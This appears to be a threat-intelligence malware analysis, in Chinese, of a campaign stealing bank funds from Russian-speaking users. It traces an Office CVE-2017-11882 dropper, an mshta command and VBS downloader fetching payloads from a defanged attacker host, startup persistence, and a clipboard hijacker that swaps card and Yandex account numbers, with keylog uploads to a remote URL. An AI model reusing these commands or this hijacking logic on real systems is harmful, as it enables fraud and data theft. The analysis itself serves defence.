背景
自從2018年10月25日起，360威脅情報中心連續捕獲了多個專門盜竊俄羅斯語用戶銀行卡資金的定向攻擊樣本。這批定向攻擊樣本主要利用微軟Office CVE-2017-11882漏洞配合釣魚文檔進行定向投遞：漏洞文檔最終釋放的木馬程序會不斷監控用戶的系統剪切板，如果發現具有銀行賬號或者yandex賬號的特征，就會把剪切板里的銀行賬號替換為攻擊者的MasterCard（萬事達）銀行卡賬號。一旦用戶通過拷貝的方式輸入目標銀行賬號，則會把錢轉向攻擊者賬戶。并且木馬程序還會下載一個俄羅斯著名的yandex.ru門戶網站提供的鍵盤管理工具Punto Switcher 3.1，以用于竊取用戶的鍵盤記錄，借以躲避殺毒軟件的查殺。
 
樣本分析
執行流程
捕獲到的樣本的整個攻擊流程如下：

Dropper
360威脅情報中心最初發現的樣本是名為логотип.doc的RTF漏洞利用文檔，該漏洞利用樣本包含一個CVE-2017-11882漏洞的公式對象。漏洞觸發后會通過執行mshta hxxp://xnz.freetzi.com/z.hta 命令來實現加載執行hxxp://xnz.freetzi.com/z.hta上的腳本：


Downloader
z.hta
下載執行的hta文件主要功能如下：

z.hta首先會使用tasklist命令結束winword.ext進程，緊接著判斷：
%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chromeupd.exe文件是否存在，如果不存在則利用Google Chrome瀏覽器去下載hxxp://xnz.freetzi.com/1.rar文件：

下載回來的1.rar其實是一個VBS腳本文件，1.rar會被移動到路徑：%userprofile%\appdata\roaming\1.vbs，然后使用wscript.exe執行該VBS腳本：

1.vbs
1.vbs腳本執行后會首先下載hxxp://xnz.freetzi.com/1.zip到%APPDATA%/1.zip，接著下載hxxp://xnz.freetzi.com/p.zip 到%APPDATA%/p.zip,并解壓到%APPDATA%目錄下：

最后把1.zip壓縮包里面的1.png移動到啟動目錄下：
%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Chromeupd.exe來實現惡意樣本持久化，最后刪除1.zip和p.zip和1.vbs文件。
Backdoor（Chromeupd.exe）
被寫入自啟動項的Chromeupd.exe是該定向攻擊木馬的核心功能模塊。樣本是C#編寫的程序，樣本運行后會首先注冊5個定時器實現其5個主要功能：
監控系統剪切板里可能出現的銀行卡賬號并替換成攻擊者的MasterCard銀行卡賬號
隱藏程序窗口
安裝下載回來的p.png（Punto Switcher 3.1版本，俄羅斯的一個正常的鍵盤管理工具）
上傳鍵盤管理工具中的diary.dat到hxxp://apz.freetzi.com/upload.php
檢查是否需要自刪除和是否需要獲取新的攻擊者的銀行卡賬號
替換剪切板里可能出現的銀行卡賬號
其中一個定時器功能會判斷當前系統剪切板里面的內容是否是字符串，如果是則判斷是哪種類型的賬號，然后將其中的賬號替換為內置的攻擊者賬號：

其中的判斷規則為：當剪切板中的字符串長度為16，則把這個16位的字符串做Luhn算法（見參考[2]）校驗。如果校驗通過，則把剪切板中的字符串替換為內置的MasterCard卡號：

而如果剪切板中的字符串長度在10到17之間，且字符串起始數字是410開頭，并且字符串全為數字字符串，則試用內置的yandex賬號替換：

而對于字符串中有‘-’或‘ ’分割的情況，同樣也會做Luhn算法校驗，校驗通過則替換為內置同樣格式的MasterCard卡號：


隱藏窗口
而當2號定時器執行時，則調用hide()函數實現當前窗口隱藏，之后讓該定時器失效：